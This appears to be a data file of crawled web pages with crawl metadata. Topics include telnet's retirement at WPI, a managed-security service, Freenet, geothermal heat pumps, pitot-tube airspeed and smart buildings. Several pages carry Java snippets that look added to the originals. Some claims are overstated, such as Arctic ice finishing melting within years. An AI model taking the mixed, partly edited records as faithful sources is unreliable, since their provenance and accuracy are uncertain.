https://reseller.com.ph/product/production-report/
2023-12-04T12:13:23
s3://commoncrawl/crawl-data/CC-MAIN-2023-50/segments/1700679100529.8/warc/CC-MAIN-20231204115419-20231204145419-00093.warc.gz
0.941569
258
CC-MAIN-2023-50
webtext-fineweb__CC-MAIN-2023-50__0__217808538
en
Manufacturing companies perform mass production daily. The production flow is continuous, so a report is highly important to keep track of all the activity happening on the production floor. It is hard to gather all the data, as each line needs to manually fill out the Production Report and submit it to the Production Staff. The Production Staff then encode the reports and compile them before submitting to management. SITO software can solve this issue. Line leaders or the Officer-in-charge can fill out the form in the mobile app instead. They can also upload pictures of assembled parts in their line and sign in the signature tab for confirmation. In addition, there is a built-in barcode scanner. SITO also records the GPS location of each data submission, so management can make sure that every report is completed on the production floor. The report submitted through the mobile app is then stored on our web server, where the Production Staff can view or edit it on our Admin Site. The Production Staff can easily export the file in xls format, with no need to encode the reports one by one. This software can save a lot of time and errors and will lift some of the burden off the Line Leads' and Production Staff's workload.
systems_science
https://precisionagingnetwork.org/about-us/
2024-02-22T18:33:10
s3://commoncrawl/crawl-data/CC-MAIN-2024-10/segments/1707947473824.13/warc/CC-MAIN-20240222161802-20240222191802-00152.warc.gz
0.871909
171
CC-MAIN-2024-10
webtext-fineweb__CC-MAIN-2024-10__0__206857973
en
The Precision Aging® Network (PAN) brings together a team of established scientists and community partners in a nationwide effort to help discover the best ways to optimize brain health across the lifespan and extend our cognitive healthspan. PAN's method is novel, creating a framework for a precision medicine approach to predict individual brain health risks and discover personalized solutions to maximize our own individual brain health.
PAN seeks your help to answer critical questions.
- What impacts healthy brain function as we age?
- How can optimal brain function be maintained across our entire lives?
- For you as an individual, how can we predict, prevent, or slow unwanted changes in cognition?
In September 2021, the National Institutes of Health, National Institute on Aging, awarded $60 million to the University of Arizona and the PAN team to launch the Precision Aging® Network.
systems_science
https://wpi.fandom.com/wiki/Telnet
2019-03-23T05:07:28
s3://commoncrawl/crawl-data/CC-MAIN-2019-13/segments/1552912202723.74/warc/CC-MAIN-20190323040640-20190323062640-00274.warc.gz
0.948654
114
CC-MAIN-2019-13
webtext-fineweb__CC-MAIN-2019-13__0__5247804
en
Telnet was the standard protocol used for connecting to WPI's server prior to the requirement of using an SSH connection. Telnet was used on campus as a noun and a verb. Students and faculty (and some staff) would frequently telnet to ccc.wpi.edu to check their e-mail, use TurnIn, or access personal files. As of August 1, 2003, telnet access was no longer allowed because it sent password information over an "insecure medium". The same security concern also led to the removal of FTP access in favor of SFTP.
systems_science
https://gen-p-soft.com/seamless-software-integration-javas-role-in-oracle-systems/
2024-04-17T22:08:37
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296817181.55/warc/CC-MAIN-20240417204934-20240417234934-00240.warc.gz
0.85833
825
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__142545783
en
Introduction: In the realm of enterprise-level software integration, the combination of Java and Oracle Systems stands as a robust and versatile solution. Java, known for its platform independence and extensive libraries, plays a pivotal role in connecting and orchestrating various software components within Oracle’s ecosystem. This article explores the fundamentals, best practices, and advantages of integrating software with Java on Oracle Systems. Understanding Software Integration with Java on Oracle Systems: Software integration involves combining different software components or systems to work cohesively. Oracle Systems, with its comprehensive suite of applications and databases, often requires seamless integration to enhance business processes. Java’s adaptability and compatibility make it a natural choice for achieving this integration, allowing for the creation of scalable and efficient solutions. Key Concepts for Integration: - Java Database Connectivity (JDBC): - JDBC, a Java-based API, is instrumental in integrating Java applications with Oracle databases. It provides a standardized way for Java programs to connect, query, and update data in Oracle databases. - Oracle WebLogic Server: - Java applications can be deployed on Oracle WebLogic Server, Oracle’s enterprise-level application server. This provides a robust platform for hosting, managing, and scaling Java-based applications in an Oracle environment. - Oracle Integration Cloud (OIC): - OIC is Oracle’s cloud-based integration platform that facilitates the seamless connection of different applications, including those developed in Java. It provides pre-built adapters and connectors to streamline integration processes. - Java EE Technologies: - Java Platform, Enterprise Edition (Java EE) technologies, such as Enterprise JavaBeans (EJB) and Java Message Service (JMS), are integral for building scalable and distributed applications that integrate seamlessly with Oracle Systems. Best Practices for Successful Integration: - Use of Oracle Cloud Services: - Leverage Oracle Cloud Services for hosting Java applications. This provides a scalable and cost-effective infrastructure for running applications that require integration with Oracle databases and services. - Security Measures: - Implement robust security measures, including encryption and secure communication channels, to safeguard data during integration processes. Oracle’s security features and Java’s security libraries can be combined for comprehensive protection. - Transaction Management: - Implement effective transaction management to ensure data consistency across integrated systems. Java Transaction API (JTA) can be employed to manage distributed transactions within Oracle Systems. - Error Handling and Logging: - Develop a comprehensive error handling and logging mechanism to facilitate troubleshooting during integration processes. Oracle’s logging tools and Java’s logging framework can be synergized for effective monitoring. Advantages of Java Integration on Oracle Systems: - Platform Independence: - Java’s „write once, run anywhere“ philosophy ensures that applications developed in Java can seamlessly run on various operating systems, making it compatible with Oracle’s diverse ecosystem. - Rich Ecosystem: - Oracle offers a rich ecosystem of products and services that complement Java integration, including databases, middleware, and cloud solutions. This synergy allows developers to build end-to-end solutions. 
- Java’s scalability and Oracle’s ability to handle large datasets make the combination ideal for building scalable and high-performance applications that can grow with evolving business needs. - Community Support: - Both Java and Oracle technologies have large and active developer communities. This support network provides access to resources, documentation, and best practices, facilitating the integration process. Conclusion: Integrating software with Java on Oracle Systems is a strategic approach to building robust, scalable, and efficient solutions for enterprise-level applications. The combination of Java’s versatility and Oracle’s comprehensive suite of products offers developers the tools they need to create seamless integrations that enhance business processes and drive digital transformation within organizations. By adhering to best practices and leveraging the strengths of both Java and Oracle Systems, developers can unlock the full potential of their integrated solutions.
systems_science
https://www.refrigerationnova.ca/residential.php
2019-08-18T13:50:51
s3://commoncrawl/crawl-data/CC-MAIN-2019-35/segments/1566027313889.29/warc/CC-MAIN-20190818124516-20190818150516-00059.warc.gz
0.926783
692
CC-MAIN-2019-35
webtext-fineweb__CC-MAIN-2019-35__0__6601474
en
Dual-energy systems with a heat pump
Dual-energy systems whose electrical component is a heat pump have certain specific characteristics. A heat pump at optimum capacity can usually provide warmth and comfort with no assistance down to an outdoor temperature of just a few degrees above freezing. This outdoor temperature is called the "equilibrium temperature" of the heat pump. A dual-energy system with an air-to-air heat pump normally operates as follows (a code sketch of this switching logic appears at the end of this page):
- When the outdoor temperature is higher than the equilibrium temperature, the heat pump alone meets the demand for heating.
- When the outdoor temperature goes down to the equilibrium temperature or lower, the heat pump must be supported by another source of energy.
- When the outdoor temperature drops under the normal switch-over ("permutation") temperature of the system (-12°C or -15°C), the heat pump's operation is blocked and the complementary energy source covers the entire heating demand on its own.
The advantages of heating and air-conditioning systems based on geothermal energy
- 67% to 70% energy savings compared to a conventional heating system, 35% savings on hot water and 50% on air-conditioning.
- Better air quality through a gentler heat.
- Constant temperature all year round.
- Since the complete unit is installed indoors, your system's operating life will be prolonged (25 years and more).
- Requires very little maintenance.
- Clean and renewable source of energy.
- The geothermal system does not emit CO2, a major contributor to pollution.
- No fire or smoke.
- No risk of vandalism, since the system is installed indoors.
- Increases the resale value of your house.
- Savings exceed your investment from the very first year.
- Significant reduction of your energy bill and of the costs related to heating system maintenance and insurance.
- It can be favourably combined with radiant heating.
Source: Natural Resources Canada and Hydro-Québec
How does it work: You have on your property an inexhaustible source of energy that can be exploited for free. Since the soil temperature remains constant at around 9°C throughout the year, a geothermal heat pump allows you to heat and cool your property efficiently and safely all year round.
Vertical loops are made of HDPE pipes placed in holes drilled in the soil. The holes range from 15 to 100 m in depth and their circumference is between 10 and 12 cm. Two pipe lengths are joined to form a "U" profile. Once the pipes are placed in the drill holes, the holes are backfilled with clay.
As their name suggests, horizontal loops are buried horizontally, usually at a depth of 2 to 2.5 m, although this can vary from 1.5 to 3 m or more. Trenches are excavated using a backhoe; a chain trencher might also be used depending on the soil composition.
These two loop types can be installed in a very cost-effective way on a property close to a lake or a pond that absorbs the energy of the sun during summer. All you need is a body of water 2 to 2.5 m deep all year round, which protects the loop from waves and ice pile-ups.
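The dual-energy switching rules described at the top of this page can be summarized in a few lines of code. The sketch below is illustrative only; the threshold values are assumptions taken from the text, and a real controller would also handle defrost cycles, hysteresis and safety interlocks.
```java
/** Illustrative mode selection for a dual-energy system with an air-source heat pump. */
public class DualEnergyController {
    enum Mode { HEAT_PUMP_ONLY, HEAT_PUMP_PLUS_BACKUP, BACKUP_ONLY }

    /**
     * @param outdoorTempC     current outdoor temperature
     * @param equilibriumTempC temperature above which the heat pump alone can carry the load
     * @param permutationTempC switch-over temperature (e.g. -12 or -15 C) below which the heat pump is blocked
     */
    static Mode selectMode(double outdoorTempC, double equilibriumTempC, double permutationTempC) {
        if (outdoorTempC < permutationTempC) {
            return Mode.BACKUP_ONLY;             // heat pump blocked, backup source carries everything
        } else if (outdoorTempC <= equilibriumTempC) {
            return Mode.HEAT_PUMP_PLUS_BACKUP;   // heat pump needs support from the second energy source
        } else {
            return Mode.HEAT_PUMP_ONLY;          // heat pump alone meets the heating demand
        }
    }

    public static void main(String[] args) {
        double equilibrium = 2.0;    // a few degrees above freezing (assumed value)
        double permutation = -12.0;  // switch-over temperature from the text
        for (double t : new double[] {8.0, -5.0, -20.0}) {
            System.out.println(t + " C -> " + selectMode(t, equilibrium, permutation));
        }
    }
}
```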
systems_science
https://fr.spinnakersupport.com/enterprise-software-support-services/security-and-vulnerability-support/
2020-01-27T13:52:30
s3://commoncrawl/crawl-data/CC-MAIN-2020-05/segments/1579251700675.78/warc/CC-MAIN-20200127112805-20200127142805-00089.warc.gz
0.914067
761
CC-MAIN-2020-05
webtext-fineweb__CC-MAIN-2020-05__0__215070742
en
Vulnerability Assessment – As application developers increasingly use open source and commercial frameworks and libraries to accelerate their production, they also introduce a long tail of inherited vulnerabilities that increase your attack surface. Spinnaker Support, powered by Alert Logic, provides the ability to run internal and external vulnerability scans and reports for on-premises, hosted, and cloud environments with continuous updates to more than 92,000 Common Vulnerabilities and Exposures (CVEs) in software and certain network components. We support several different use cases including automated agent-based scanning and agentless continuous scanning approaches for software and device vulnerabilities, monitoring your AWS environments for misconfigurations, and providing external scanning as a PCI Approved Scanning Vendor.
Managed Web Application Firewall (WAF) – We provide a managed web application firewall service to block known bad activity. We will start you with out-of-the-box signatures and both positive and negative rules to observe your applications' behavior through the WAF's deny logs. We add and tune rules, potentially down to the level of specific pages and even forms, to eliminate false positives. Blocking rules are turned on selectively as you and our WAF specialist are comfortable that enough traffic has passed through to validate that the rule correctly fires without undue false positives. Your Spinnaker Support team will continue to update and tune your WAF as your applications and threat environment evolve.
Data Inspection – We collect and inspect 3 kinds of data for suspicious activity. Each data type has strengths in identifying certain kinds of threats, and taken together they provide the whole picture, improving accuracy and actionable context. (1) Web: We inspect both HTTP requests and HTTP responses. (2) Log: We collect and normalize log data so analytics can identify certain threat activity like brute force and lateral movement, so analysts can investigate logs, and so you can search and report on it whenever you want for forensics and audits, since we retain it for at least one year. (3) Network: Our IDS agents inspect all network packets and select those that look suspicious for further analysis in our analytics engine.
Detection Analytics – Analytics weed out false positives and more accurately detect actual attacks with 3 different kinds of analytics: (1) Signatures and rules that detect known malicious patterns; (2) Anomaly detection that compares current activity against baselines to flag unusual activity; (3) Machine learning, which includes more than 200,000 vectors (vs. typical 5-10 in a signature) across data from thousands of customers to identify custom, multi-stage attacks. All 3 types of analysis benefit from a treasure trove of rich, consistent data we collect from 4000 customers, which gives us a force multiplier for our analytics to find patterns other vendors could never see.
24 x 7 Monitoring & Validation – As part of our security and vulnerability protection solution, analysts in one of our 24 x 7 x 365 security operations centers investigate and triage incidents as they are created through the analytics.
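As an illustration of the kind of log-based rule referred to above (brute-force detection), the sketch below counts failed logins per source IP inside a sliding time window. It is a simplified, hypothetical example and does not represent Alert Logic's or Spinnaker Support's actual analytics.
```java
import java.util.ArrayDeque;
import java.util.Deque;
import java.util.HashMap;
import java.util.Map;

/** Toy log-analytics rule: flag a source IP with too many failed logins inside a sliding window. */
public class BruteForceRule {
    private final int threshold;
    private final long windowMillis;
    private final Map<String, Deque<Long>> failuresByIp = new HashMap<>();

    BruteForceRule(int threshold, long windowMillis) {
        this.threshold = threshold;
        this.windowMillis = windowMillis;
    }

    /** Feed one failed-login event; returns true if this IP has crossed the threshold. */
    boolean onFailedLogin(String sourceIp, long timestampMillis) {
        Deque<Long> window = failuresByIp.computeIfAbsent(sourceIp, ip -> new ArrayDeque<>());
        window.addLast(timestampMillis);
        // Drop events that have fallen out of the sliding window.
        while (!window.isEmpty() && timestampMillis - window.peekFirst() > windowMillis) {
            window.removeFirst();
        }
        return window.size() >= threshold;
    }

    public static void main(String[] args) {
        BruteForceRule rule = new BruteForceRule(5, 60_000); // 5 failures within 60 seconds
        long t = 0;
        for (int i = 0; i < 6; i++) {
            boolean alert = rule.onFailedLogin("203.0.113.7", t += 5_000);
            if (alert) System.out.println("ALERT: possible brute force from 203.0.113.7");
        }
    }
}
```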
Spinnaker Support ERP Security Experts and Alert Logic Certified Security Experts Includes: - Experts with extensive backgrounds and experience in international, cyber, military, and civilian security - Compliance expertise in PCI DSS, HIPAA, NERC, CJIS, NIST, SOX COBIT, GLBA, and GDPR Spinnaker Support, powered by Alert Logic, offers full technology stack security and vulnerability protection with human expertise included (security analysts combined with Oracle and SAP application engineers.) Our customers deal with one single vendor, for service, pricing, commercial terms, and communication coordination. Plus, there is no upcharge for our standard security and vulnerability support. For more information on Spinnaker Support’s Advanced Security solution, contact us today.
systems_science
https://bleenman.wordpress.com/2012/10/17/business-agility-layer-the-answer-to-it-obesity/
2020-04-04T05:45:29
s3://commoncrawl/crawl-data/CC-MAIN-2020-16/segments/1585370520039.50/warc/CC-MAIN-20200404042338-20200404072338-00162.warc.gz
0.954958
1,644
CC-MAIN-2020-16
webtext-fineweb__CC-MAIN-2020-16__0__224780917
en
I have devoted a lot of my posts to discussing the notion of what it is to be a ‘Social Enterprise’ or, now that that term is no longer being used, the ‘Socially connected enterprise’. But how do you get there? And how do you stay there when everything around you – and within your company – is evolving so rapidly. Well, crucial to getting there and staying there is the ‘Business Agility Layer’ – a valuable notion that I believe is the cure to the problem of IT obesity. This post will explore what this ‘layer’ looks like and what form it takes in a day-to-day technology context. What is IT obesity? Many organizations suffer from IT obesity. It’s remarkable how the problem of IT obesity has emerged in parallel with the prevalence of obesity among humans (maybe IT tells us more about our characters than we’d care to admit?) The last few decades have seen a huge increase in the complexity of IT systems. Today, many generations of infrastructure and software operate alongside each other, intertwined like a plate of spaghetti. As the role and value of IT has increased, we have added new functionalities and we have added new technologies. The operative word in all of this is ‘added’. Very little ‘subtracting’ or ‘consolidating’ has taken place during this time. So now consider how many new technologies have been developed in the last couple of decades, how many times business needs have changed. Living proof of how things have changed exists in almost every enterprises’ IT landscape, with data centers resembling ‘journeys through time’. Today, IT decision makers are weighed down by this history – unable to maneuver or innovate due to the sheer complexity and weight of the IT landscape. Think of this using the obesity analogy… IT has become so fat that the business can no longer run or change direction as and when it needs to. Throw into this unhealthy mix an economic crisis and all of the additional pressures that departments face during a downturn (reduce cost at all cost), and it doesn’t make for a pretty picture. In many cases, IT became the inhibiter of change. As a result of this IT obesity, the disconnect between business and IT has become more profound, with business coming to see IT as an impediment to positive change within the business. While the business calls out for solutions to its rapidly evolving challenges, IT is often found to be slow to react, engrossed instead in deploying the latest release or version of a traditional software solution. In this way, the business-IT divide has evolved from being organizational, to being political as well. Where no alignment with the business exists, the IT department goes about its own business, and in the process, continues to suffer from IT obesity. Sounds awfully grim doesn’t it? Don’t despair – there is hope! Cloud technology is the answer. There is a light shining at the end of this seemingly very dark tunnel. Cloud computing technology has opened a world of new possibilities and has breathed new life into the business-technology relationship. Thanks in no small part to this paradigm-changing technology, the notion of business-enabling IT is, once again, a reality. Anytime anywhere connectivity, cloud economies of scale and a host of other new technologies, have come together and created the conditions for the emergence of the business agility layer. 
And while this doesn’t remedy all the IT ills of the past in one single act, this layer can be spread across the existing legacy IT landscape, adding a degree of flexibility and interconnection that would otherwise be impossible. This business agility layer serves as a link between old and new, and enables pent-up demand from the business to be satisfied without the daunting obstacle of having to delve too deep into the deep-and-complex legacy IT landscape. Now the potential exists to effectively combine old and new – core IT systems for the stable processes, and rapidly deployable cloud-based apps to support business users wherever they are and on whatever device they are using at the time. Business are already embracing digital transformation as an outside-in innovation. Prompted by the rise in social media technology and quick-and-easy-to-deploy apps, marketing and sales departments have already begun to bypass the traditional route through IT and have instead started taking matters into their own hands. With the need to ‘listen’ to what is happening in the social media domain, integrating these technologies has taken on paramount importance. This can be seen as an ‘outside-in’ approach and, in many cases, is serving to deepen and widen the divide between business and IT. This is also resulting in the growing perception that IT is failing the business by not being able to integrate these highly relevant tools fast enough. Most IT departments I meet are still unable to achieve the shift in mentality that is required by technologies such as cloud and social media. End-to-end process innovation. Apply ‘the art of the possible’. IT can, though, be part of the solution to this problem. This does, though require a dramatic change in mentality. IT occupies a unique position within the business because it is capable of adding value at literally all levels of the business… provided, that is, that it adopts the right mentality. By overcoming the fear of these new technologies, IT can re-invent itself and go from being and inhibitor of change to an enabler of transformation. IT can create a new vision on architecture, namely a hybrid application landscape that combines cloud platforms with on-premise applications. The options are certainly out there in the form of SaaS solutions: Salesforce.com, Oracle (Fusion) On Demand, SAP On Demand and Microsoft Cloud, and even Google Enterprise Apps. I make no secret of the fact that I see Salesforce.com as the game changer in all of this – where they lead, others tend to follow. This is certainly the case with sales and marketing and, as outlined in an earlier post of mine (The Ripple Effect of Social HR) the same is now happening in HR. Business Agility Layer through PaaS. But the Agility Layer is starting to spread below just ‘apps’ level and deeper into the IT landscape. Cloud based Platform as a Service (PaaS) can also be seen to e playing the role of the business agility layer. Force.com, Microsoft Azure, as well as powerful tools like Cordys, Mendix, OrangeScape (to name just a few), are acting as enabling technologies and providing the means by which IT landscapes can get themselves back into shape again. So it’s possible. But what does it take to get there? There’s no excuse for enterprise IT to be out of shape. Given the technology options available today, there is no reason for IT to continue to be seen as the inhibitor of change within the enterprise. Re-invention is a bold step, but it’s one that’s worth taking. 
It does, though, take an ‘Enlightened CIO’ to embark upon, and successfully complete this journey. Board-room level support is also key to make the transition. I know that most organizations I speak to won’t be able to achieve this transformation easily. I fear that the issue of IT obesity is not yet seen as a life-threatening disease (similar to real life?). Most CIO’s are – and I apologise for this harsh expression – not enlightened but frightened, focusing instead on survival, on ‘keeping the lights on’, instead of taking the bold but worthwhile step of driving change and embracing the art of the possible. While fear of change is understandable, we should be asking ourselves this important question. How much longer can you afford to wait before you get left behind… for good?
systems_science
http://www.openp2p.com/pub/d/307
2018-01-24T11:53:27
s3://commoncrawl/crawl-data/CC-MAIN-2018-05/segments/1516084894125.99/warc/CC-MAIN-20180124105939-20180124125939-00541.warc.gz
0.877358
239
CC-MAIN-2018-05
webtext-fineweb__CC-MAIN-2018-05__0__242206591
en
P2P Directory > Infrastructure, Reputation and Asset Management > Freenet: The Free Network Project Freenet is a large-scale peer-to-peer network that depends on the power of member computers around the world to create a massive virtual information store open to anyone to freely publish or view information of all kinds. Freenet lacks any centralized control or administration and allows information to be published without identifying its source or its physical location. The Freenet Network consists of many computers on the Internet each running a piece of software called the "Freenet Server" or "Freenet Daemon" that enables a computer to become a "node" (a small but equal part of the larger Freenet network). The system provides a flexible and powerful infrastructure capable of supporting a wide range of applications. It enables the anonymous and uncensorable publication of material ranging from grassroots alternative journalism, provides a method for the distribution of high-bandwidth content, and provides a platform for universal personal publishing. A Quickstart and User's Manual will help get you started if you're interested in participating. Date Listed: 06/07/2001
systems_science
http://www.mostimportantthings.org/2018/03/22/water-and-life/
2020-05-30T01:59:54
s3://commoncrawl/crawl-data/CC-MAIN-2020-24/segments/1590347407001.36/warc/CC-MAIN-20200530005804-20200530035804-00231.warc.gz
0.946083
631
CC-MAIN-2020-24
webtext-fineweb__CC-MAIN-2020-24__0__59907568
en
Water makes life on Earth possible. It unites the living world like nothing else. From the lunar tides, ocean currents and seasons to the molecules that build us all, it permits and regulates all life. Embedded within this big picture, subject to the rules of ecology but often careless of them, are people. Almost all the world’s water is salty but we live on land, where a regular supply of fresh, clean water is utterly precious. It is the single most important of the ‘on/off’ switches that are hidden under the floorboards of our lives. But we have allowed these sources of fresh, clean water to be abused, diverted, polluted, or dried up. Repair is possible, but only by focusing on the ways of nature and the needs of the weak. And now climate change is demolishing the very fabric of our home, making everything worse. Water has a special structure in which its molecules, each made up of two atoms of hydrogen and one of oxygen, have a different charge on each side, so the molecules attract one another. This attraction is called a hydrogen bond, and it is strong enough to join water molecules into a swarm that behaves like a supermolecule, but weak enough that the bonds continually form and break depending on how much energy there is in the system. When there is very little energy, the molecules freeze together into ice; when there is much more, they break apart into steam. But at middle energies, they ‘shimmer’ in a way that makes life work at the level of cellular structures and chemical metabolism. Because water molecules are polar – each with a positive and a negative side – they can get a grip on all sorts of other molecules, so water dissolves and mixes with more things than any other liquid. Then, the hydrogen bonds also do weird things to how water behaves under different conditions, which make life possible at the level of organisms, ecosystems, and the whole biosphere. They allow water to absorb or lose a lot of energy before it changes from liquid to ice or steam, so blood and ocean currents carry a lot of heat. Put these things together, multiply them by a couple of billion cubic kilometres of water, each weighing a trillion tonnes, and stir using the energy of a vast thermonuclear reactor (the Sun), and you have the main unifying theme of our living world. But because of the hydrogen bonds, ice needs 80 times more energy to melt than liquid water does to warm up. This alone puts water among the most important things right now, since the ice in the Arctic Ocean has been absorbing the extra heat of global warming for decades, and every summer there is less ice up there. When it finishes melting, only a few years from now, a sudden heating of the Arctic is inevitable, along with a surge of methane and other greenhouse gases. This is what people mean when they talk about ‘tipping points’ and ‘runaway climate change’, and it could spell the end of the only living world that we have ever known. © Julian Caldecott
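The "80 times" figure above can be checked with a back-of-envelope calculation using standard textbook values (a latent heat of fusion of about 334 kJ/kg for ice and a specific heat of about 4.18 kJ/(kg·K) for liquid water); these numbers are mine, not the essay's. A tiny sketch:
```java
/** Back-of-envelope check of the "ice needs ~80 times more energy to melt" claim. */
public class MeltingEnergyCheck {
    public static void main(String[] args) {
        double latentHeatOfFusion = 334.0;   // kJ per kg to melt ice at 0 C (standard textbook value)
        double specificHeatWater  = 4.18;    // kJ per kg to warm liquid water by 1 C
        double ratio = latentHeatOfFusion / specificHeatWater;
        System.out.printf("Melting 1 kg of ice takes ~%.0f times the energy of warming 1 kg of water by 1 C%n", ratio);
        // Prints roughly 80, which is where the essay's figure comes from.
    }
}
```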
systems_science
http://www.coalfire.caf.dlr.de/results/result_vm_dynamic_pressure_en.html
2013-05-22T02:28:00
s3://commoncrawl/crawl-data/CC-MAIN-2013-20/segments/1368701153213/warc/CC-MAIN-20130516104553-00028-ip-10-60-113-184.ec2.internal.warc.gz
0.908347
364
CC-MAIN-2013-20
webtext-fineweb__CC-MAIN-2013-20__0__167049575
en
Dynamic Pressure Measurements
Dynamic pressure measurements are performed using a pitot-static tube. The pitot-static tube is composed of two concentric tubes. At the front end of the tube the outer tube is sealed and only the inner tube is open. This point, called the stagnation port, is a blunt obstacle to airflow and therefore the drag coefficient is unity. The pressure exerted on this port consists of the dynamic pressure of the flow and the static ambient pressure (Figure 2).
Figure 3: Pitot-static tube (modified after Brock and Richardson 2001)
At a distance from the stagnation port sufficient to eliminate dynamic flow effects, the pitot-static tube has a couple of small holes penetrating only the outer tube. These are called static ports and they are usually distributed equally spaced around the tube. The pressure exerted on the static ports is only the ambient atmospheric pressure (Fig. 1). The rear end bears two connections, one transferring the pressure applied to the outer tube (pstatic) and a second for the inner tube (pstag).
According to Bernoulli's equation the pressures can be described as pstag = pstatic + (ρ/2)·V², using p = ambient pressure, ρ = air density and V = air velocity. After the transformation the equation reads as follows:
V = sqrt(2 · (pstag − pstatic) / ρ)
The variable ρ can be substituted with p/RT, where R is the gas constant for dry air = 287 J kg⁻¹ K⁻¹ and T is the air temperature in K, leading to the final equation:
V = sqrt(2 · R · T · (pstag − pstatic) / p)
Since R is the gas constant for dry air, humidity will have an effect, but less than 1%. Although the pitot-tube has to be oriented directly into the airflow, a typical tube will tolerate up to 20° of misalignment (BROCK and RICHARDSON 2001).
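A short worked example of the final relation, using assumed values for the differential pressure, ambient pressure and temperature (the numbers are illustrative, not measurements from the text):
```java
/** Worked example of the pitot-static relation: airspeed from differential pressure. */
public class PitotAirspeed {
    static final double R_DRY_AIR = 287.0; // J / (kg K), gas constant for dry air

    /** V = sqrt(2 * R * T * (pStag - pStatic) / p), with pressures in Pa and T in kelvin. */
    static double airspeed(double pStagPa, double pStaticPa, double ambientPressurePa, double tempK) {
        return Math.sqrt(2.0 * R_DRY_AIR * tempK * (pStagPa - pStaticPa) / ambientPressurePa);
    }

    public static void main(String[] args) {
        double dynamicPressure = 150.0;      // Pa, example differential reading (pStag - pStatic)
        double ambient = 101_325.0;          // Pa, standard sea-level pressure
        double temperature = 288.15;         // K (15 C)
        double v = airspeed(ambient + dynamicPressure, ambient, ambient, temperature);
        System.out.printf("Airspeed ~ %.1f m/s%n", v);
        // Cross-check via V = sqrt(2 * q / rho) with rho = p / (R T), about 1.225 kg/m^3 here:
        double rho = ambient / (R_DRY_AIR * temperature);
        System.out.printf("Cross-check: %.1f m/s%n", Math.sqrt(2.0 * dynamicPressure / rho));
    }
}
```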
systems_science
http://www.teresapetulla.com/glow-stress/
2019-10-23T09:11:10
s3://commoncrawl/crawl-data/CC-MAIN-2019-43/segments/1570987829507.97/warc/CC-MAIN-20191023071040-20191023094540-00454.warc.gz
0.89275
346
CC-MAIN-2019-43
webtext-fineweb__CC-MAIN-2019-43__0__68108821
en
GlowStress is a next-gen comprehensive nondestructive surface defect detection solution based on new carbon nanotube technology. Our nondestructive surface testing system works on existing aircraft, including next-generation aircraft, and outperforms current testing methods by providing engineers with the information they need to clear an aircraft for flight within 15 minutes. GlowStress is a business plan proposal, developed by a team of University of Pennsylvania students, that addresses the current needs of the aerospace industry for new nondestructive testing methods that provide fast, accurate, and comprehensive surface defect detection. The precision of the system removes the need for qualitative judgment calls by providing information on every point of an aircraft's surface, giving engineers the confidence that all defects on an aircraft's surface are accounted for.
Inspection is a three-part process:
Step 1: Paint It. GlowPaint is a clear nanotechnology varnish that is applied to aircraft, essentially forming a skin of sensors on the entire surface. GlowPaint is integrated into regular aircraft paint cycles.
Step 2: Scan It. GlowScan scans an aircraft's entire surface using a laser-spectrometer array. Testing can be done within 15 minutes, allowing pre-flight and post-flight inspections.
Step 3: Read It. GlowRead, our proprietary diagnostic software, provides an easy-to-understand visual readout of defects and possible areas of weakness on an aircraft's surface.
GlowStress' simple application process reduces setup time and our integrated system outperforms current nondestructive surface testing on scope, time, and accuracy. Because at 30,000 feet, every detail counts.
systems_science
https://www.efficiencynation.com/post/high-rise-living-in-the-smart-age-the-compelling-case-for-intelligent-residential-buildings
2023-11-28T15:51:01
s3://commoncrawl/crawl-data/CC-MAIN-2023-50/segments/1700679099892.46/warc/CC-MAIN-20231128151412-20231128181412-00419.warc.gz
0.914809
659
CC-MAIN-2023-50
webtext-fineweb__CC-MAIN-2023-50__0__93461770
en
High-Rise Living in the Smart Age: The Compelling Case for Intelligent Residential Buildings Smart buildings are no longer just a blueprint for the future; they are today's reality, fundamentally transforming the architecture of urban landscapes worldwide. While the initial focus has been on commercial spaces and industrial complexes, the benefits of smart technologies in residential high-rises have become increasingly clear. These technologically-advanced structures offer a unique blend of financial viability, unprecedented security, and exceptional sustainability, making them the smart choice for developers, owners, and residents alike. Capturing Cost-Efficiency for Developers and Owners From a developer’s perspective, smart high-performance residential buildings offer unparalleled financial incentives. Leveraging actual energy performance data allows for significant capital cost reductions in mechanical plant sizing and related infrastructure. In a sector where every penny counts, the implications of these cost reductions can be revolutionary. Property owners and managers are also beneficiaries. Reduced utility costs, lesser carbon tax liabilities, and streamlined operational expenses all contribute to better Net Operating Income (NOI) and Net Asset Value (NAV). The advent of smart technologies is turning high-performance into high-reward investments. Mechanical Operations: The Heart of Smart Efficiency The optimization of mechanical operations is key to realizing the full benefits of smart buildings. System performance data enables the right-sizing of equipment, informed planning for retrofits, and peak mechanical efficiency. Smart HVAC systems, for example, can autonomously adjust themselves based on various data inputs, thereby reducing energy consumption by up to 30%. The Synergy of Technology and Expertise While technology plays a significant role in gathering, normalizing, and transmitting data for smart buildings, the human element cannot be ignored. Industry professionals with a blend of theoretical knowledge and practical experience are essential for analyzing data and making smart recommendations. Their expertise ensures that the efficiencies brought by smart technologies have a validated, quantified, and measured impact—both operationally and financially. Hitting Sustainability Targets As cities and organizations globally grapple with carbon reduction goals, smart residential buildings have emerged as the unexpected heroes. By optimizing mechanical systems, these buildings can offer up to 40% energy savings and 25-30% reduction in greenhouse gas emissions. It’s a win-win situation for building owners committed to sustainability and residents keen on reducing their carbon footprint. The Resident Experience: Smart Living For residents, the advantages go beyond cost-saving and sustainability. Smart high-rises are wired to improve the quality of life, from AI-driven security features to IoT devices that make homes more comfortable and efficient. Think of facial recognition-enabled access systems, apps that guide residents to available parking spaces, or even smart refrigerators that help manage grocery shopping. Smart high-rise residential buildings are not just the homes of the future; they are the homes of today. Through a potent combination of cutting-edge technologies and industry expertise, these structures provide a multitude of benefits that far outweigh the initial investment costs. 
As smart technologies continue to evolve and become more integrated into our everyday lives, the question is not if but when the majority of the world's high-rises will transform into smart buildings. One thing is clear: the future of urban living is smart.
systems_science
https://ode2commies.blogspot.com/2023/06/
2024-04-19T02:52:35
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296817253.5/warc/CC-MAIN-20240419013002-20240419043002-00052.warc.gz
0.959113
6,480
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__198907000
en
